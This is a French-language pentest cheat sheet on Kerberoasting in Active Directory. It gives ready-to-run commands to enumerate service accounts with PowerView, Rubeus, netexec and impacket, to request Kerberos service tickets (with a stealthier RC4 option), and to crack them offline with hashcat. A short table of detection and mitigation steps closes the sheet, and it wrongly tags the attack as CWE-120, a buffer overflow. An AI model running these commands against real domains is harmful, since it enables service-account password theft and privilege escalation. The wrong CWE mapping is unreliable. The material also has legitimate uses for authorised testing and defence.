Le kerberoasting consiste à cibler les utilisateurs ayant un SPN. De ce fait, il est possible de récupérer un TGS à leur nom et ainsi de tenter de le cracker pour récupérer le password du compte.
Powershell
Lister les comptes avec un SPN
powershell
Get-DomainUser -SPN #powerview
---
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #powershellAvec Rubeus
powershell
Rubeus.exe kerberoast /statsRequest un TGS
powershell
Rubeus.exe kerberoast /user:utilisateur /simpleRequest un TGS sans downgrade du chiffrement.
Cela permet de ne demander que les SPN avec un chiffrement type RC4_HMAC, ce qui est potentiellement plus stealthy
powershell
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:utilisateur /simple /rc4opsecEn .net
Request d'un tgs
powershell
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "USSvc/serviceaccount"Depuis linux
Lister les comptes avec un SPN
bash
netexec ldap -u "user" -p "password" --kerberoasting output.txt
---
impacket-GetUserSPNs -dc-ip $ip -u "" -p "" $domain/$user
impacket-GetUserSPNs -dc-ip $ip $domain/$user -request -outputfile output.txtCracker le tgs
bash
hashcat -m 13100 '$tgs' /usr/share/wordlist/rockyou.txt| Catégorie | Information |
|---|---|
| TTP | T1208 (Kerberoasting) |
| CWE | CWE-120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')) |
| Description de l'attaque | Kerberoasting exploite la fonctionnalité des tickets de service Kerberos dans les environnements Windows. Les attaquants extraient les tickets de service Kerberos et les craquent hors ligne pour obtenir des mots de passe d'utilisateurs de service faibles. |
| Impacts potentiels | - Accès non autorisé aux ressources réseau - Compromission de comptes de service - Élévation de privilèges |
| Comment la détecter | - Surveillance des demandes anormales de tickets de service Kerberos - Analyse des journaux pour les tentatives de connexion échouées fréquentes - Utilisation d'outils de détection d'intrusion |
| Remédiations/mitigations | - Utiliser des mots de passe forts pour les comptes de service - Appliquer la politique de sécurité Least Privilege - Mettre en œuvre des audits réguliers des comptes et des mots de passe - Utiliser Advanced Threat Protection pour surveiller les activités suspectes |
| Lien de référence | MITRE ATT&CK - T1208: Kerberoasting |